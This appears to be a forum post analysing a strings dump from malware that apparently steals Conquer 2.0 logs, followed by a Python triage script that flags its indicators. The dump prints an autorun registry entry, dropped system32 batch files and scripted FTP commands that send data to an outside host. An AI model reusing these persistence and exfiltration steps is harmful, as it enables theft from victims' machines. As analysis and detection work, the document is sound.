Here's a list of the strings in the program exported from PE Explorer.
It may give you guys some idea of what to look for in the future.
@EleventySeven11: good job picking up on the spoolvs file. I didn't catch that but I recognized FTP access going on.
Interesting parts:
Code:
00443120: 'C:\Program Files\Internet Explorer\spoolvs.exe',0
00443164: 'Software\Microsoft\Windows\CurrentVersion\Run',0
00443192: 'spoolvs',0
0044319A: 'USERDOMAIN',0
004431F5: '-Log.txt',0
004431FE: 'OPEN reaper.0moola.com',0Ah,0
00443216: 'USER reaper.0moola.com',0Ah,0
0044322E: 'parrots',0Ah,0
00443237: 'ASCII',0Ah,0
0044323E: 'SEND ',0
00443244: 'BYE',0Ah,0
00443249: 'exit',0Ah,0
00443250: 'C:\WINDOWS\system32\system.bat',0
00443270: 'ftp -n -i -s:C:\WINDOWS\system32\drivers\config.sys',0Ah,0
004432A5: 'bye',0Ah,0
004432AC: 'C:\WINDOWS\system32\syssvr.bat',0
004432CC: 'C:\WINDOWS\system32\update.bat',0
004432EC: 'C:\Program Files\Conquer 2.0\log',0
0044330D: 0Ah,'-------SERVER_LOG-----------',0
0044332B: '---------END_LOG------------',0
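As an added example, not from the post or from PE Explorer, here is a small Python triage script that parses this export format (`ADDRESS: 'text',0Ah,0` operands) back into the strings the binary holds and flags the behaviours seen above: the autorun registry value, the scripted `ftp -s:` session, and the batch files dropped into system32. The indicator labels and the constructed sample dump are assumptions of mine, with sample lines copied from the export above.

```python
import re
from collections import defaultdict
# Constructed sample in PE Explorer's export format, lines taken from the post above.
SAMPLE_DUMP = r"""
00443120: 'C:\Program Files\Internet Explorer\spoolvs.exe',0
00443164: 'Software\Microsoft\Windows\CurrentVersion\Run',0
004431FE: 'OPEN reaper.0moola.com',0Ah,0
00443250: 'C:\WINDOWS\system32\system.bat',0
00443270: 'ftp -n -i -s:C:\WINDOWS\system32\drivers\config.sys',0Ah,0
0044330D: 0Ah,'-------SERVER_LOG-----------',0
"""
LINE_RE = re.compile(r"^([0-9A-Fa-f]{6,8}):\s*(.+?)\s*$")
# MASM-style operands: a 'quoted run' or a number; an 'h' suffix marks hex (0Ah = newline).
TOKEN_RE = re.compile(r"'([^']*)'|([0-9A-Fa-f]+)(h?)")
# (label, pattern) pairs for the behaviours visible in this sample: an autorun registry
# value, a scripted ftp session, and helper batch files dropped into system32.
INDICATOR_RULES = [
    ("persistence:run-key", re.compile(r"\\CurrentVersion\\Run\b", re.I)),
    ("exfil:ftp-scripted", re.compile(r"^ftp\b.*-s:", re.I)),
    ("exfil:ftp-command", re.compile(r"^(OPEN|USER|SEND|BYE)\b")),
    ("dropper:system32-bat", re.compile(r"\\system32\\[^\\]+\.bat$", re.I)),
]

def decode_operands(operands: str) -> str:
    """Rebuild what the binary holds: 0Ah becomes a newline, the final 0 (NUL) is dropped."""
    out = []
    for m in TOKEN_RE.finditer(operands):
        if m.group(1) is not None:          # quoted text
            out.append(m.group(1))
        elif value := int(m.group(2), 16 if m.group(3) else 10):  # 0 terminates; keep 0Ah etc.
            out.append(chr(value))
    return "".join(out)

def parse_strings_dump(text: str) -> list[tuple[int, str]]:
    """Return (virtual address, decoded string) for each 'ADDRESS: operands' line."""
    entries = []
    for line in text.splitlines():
        if m := LINE_RE.match(line.strip()):
            entries.append((int(m.group(1), 16), decode_operands(m.group(2))))
    return entries

def triage(text: str) -> dict[str, list[str]]:
    """Map each indicator label to the decoded strings (trailing newline stripped) that matched."""
    hits: dict[str, list[str]] = defaultdict(list)
    for _addr, s in parse_strings_dump(text):
        for label, rule in INDICATOR_RULES:
            if rule.search(s):
                hits[label].append(s.rstrip("\n"))
    return dict(hits)
```

Run `triage(open("strings.txt").read())` on a real PE Explorer export to get the same labelled findings; strings that match no rule are left for manual review.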